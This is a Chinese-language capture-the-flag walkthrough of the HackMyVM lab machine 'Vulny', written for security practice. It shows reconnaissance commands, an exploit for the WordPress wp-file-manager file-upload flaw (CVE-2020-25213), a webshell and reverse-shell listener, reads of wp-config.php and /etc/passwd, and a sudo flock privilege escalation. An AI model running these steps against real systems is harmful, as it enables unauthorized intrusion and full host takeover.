渗透测试练习No.76 Vulny

admin 2022年4月23日11:42:21评论55 views字数 2403阅读8分0秒阅读模式

渗透测试练习No.76 Vulny

靶机信息

下载地址:

https://hackmyvm.eu/machines/machine.php?vm=Vulny
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx

靶场: HackMyVm.eu

靶机名称: Vulny

难度: 简单

发布时间: 2020年10月15日

提示信息:

目标: user.txt和root.txt


实验环境

攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only

靶机:Vbox linux IP自动获取 网卡host-Only


信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo arp-scan -I eth1 10.0.0.0/24

渗透测试练习No.76 Vulny

扫描到主机地址为10.0.0.143

扫描端口

扫描靶机开放的服务端口

sudo nmap -sC -sV -p- 10.0.0.143 -oN nmap.log

渗透测试练习No.76 Vulny

扫描到开放80和33060端口,先来看看80端口

Web渗透

渗透测试练习No.76 Vulny

访问后打开apache默认页面,做个目录扫描

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://10.0.0.143 -x php,html,txt,zip

渗透测试练习No.76 Vulny

发现secret目录,访问看下

渗透测试练习No.76 Vulny

提示在某个配置页面下有账号密码,继续目录扫描

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://10.0.0.143/secret -x php,html,txt,zip

渗透测试练习No.76 Vulny

未发现配置文件,继续扫描

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://10.0.0.143/secret/wp-content -x php,html,txt,zip

渗透测试练习No.76 Vulny

扫描到多个目录,打开看看

http://10.0.0.143/secret/wp-content/uploads/2020/10/

渗透测试练习No.76 Vulny

在uploads目录下找到一个压缩包,下载下来看看

wget http://10.0.0.143/secret/wp-content/uploads/2020/10/wp-file-manager-6.O.zip
unzip wp-file-manager-6.O.zip
cd wp-file-manager-6.O
ls

渗透测试练习No.76 Vulny

渗透测试练习No.76 Vulny

查看file_folder_manager.php文件内容

gedit file_folder_manager.php

渗透测试练习No.76 Vulny

发现是文件管理插件,版本是6.0这个版本存在远程代码执行漏洞,来看看如何利用

渗透测试练习No.76 Vulny

找到exp,下载后执行exp,这个exp有问题,我到github上又找了一个

git clone https://github.com/mansoorr123/wp-file-manager-CVE-2020-25213.git
chmod +x wp-file-manager-CVE-2020-25213.git
./wp-file-manager-CVE-2020-25213.sh -h

渗透测试练习No.76 Vulny

先来验证下是否存在漏洞

./wp-file-manager-exploit.sh --wp_url http://10.0.0.143/secret --check

渗透测试练习No.76 Vulny

发现漏洞,上传webshell

./wp-file-manager-exploit.sh --wp_url http://10.0.0.143/secret -f /tmp/shell.php --verbose

渗透测试练习No.76 Vulny

上传成功,先在攻击机上监听4444端口,再访问shell.php触发反弹

1。攻击机监听4444端口

nc -lvvp 4444

渗透测试练习No.76 Vulny

2。访问shell.php

curl http://10.0.0.143/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php

渗透测试练习No.76 Vulny

反弹成功,来找下敏感信息/var/www/html目录下没有wordpress,查找下放哪里了

find / -name wordpress |grep -v 'Permission denied'

渗透测试练习No.76 Vulny

找到程序存放位置,

cd /usr/share/wordpress
cat wp-config.php

渗透测试练习No.76 Vulny

wp配置文件中未找到数据库账号密码,但是发现一段不应该存在的注释,猜测是secret目录提示的密码,再来看看哪些用户可以登录

cat /etc/passwd |grep bash

渗透测试练习No.76 Vulny

发现用户adrian,切换到adrian账号

渗透测试练习No.76 Vulny

拿到adrian权限 ,先来切换到交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键
stty raw -echo;fg
reset

渗透测试练习No.76 Vulny

切换完成,来查找敏感信息

cd ~
ls
cat user.txt

渗透测试练习No.76 Vulny

拿到user.txt,继续找

sudo -l

渗透测试练习No.76 Vulny

发现可以使用root身份执行flock文件,先来看看这个文件是什么

/usr/bin/flock
/usr/bin/flock --help

渗透测试练习No.76 Vulny

发现flock可以执行命令,先来看看flock如何执行命令

https://gtfobins.github.io/gtfobins/flock/

渗透测试练习No.76 Vulny

来验证一下

sudo -u root flock -u / /bin/bash
id
cat /root/root.txt

渗透测试练习No.76 Vulny

提权成功,拿到root.txt,游戏结束。

渗透测试练习No.76 Vulny

渗透测试练习No.76 Vulny

原文始发于微信公众号(伏波路上学安全):渗透测试练习No.76 Vulny

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日11:42:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试练习No.76 Vulnyhttp://cn-sec.com/archives/913492.html

发表评论

匿名网友 填写信息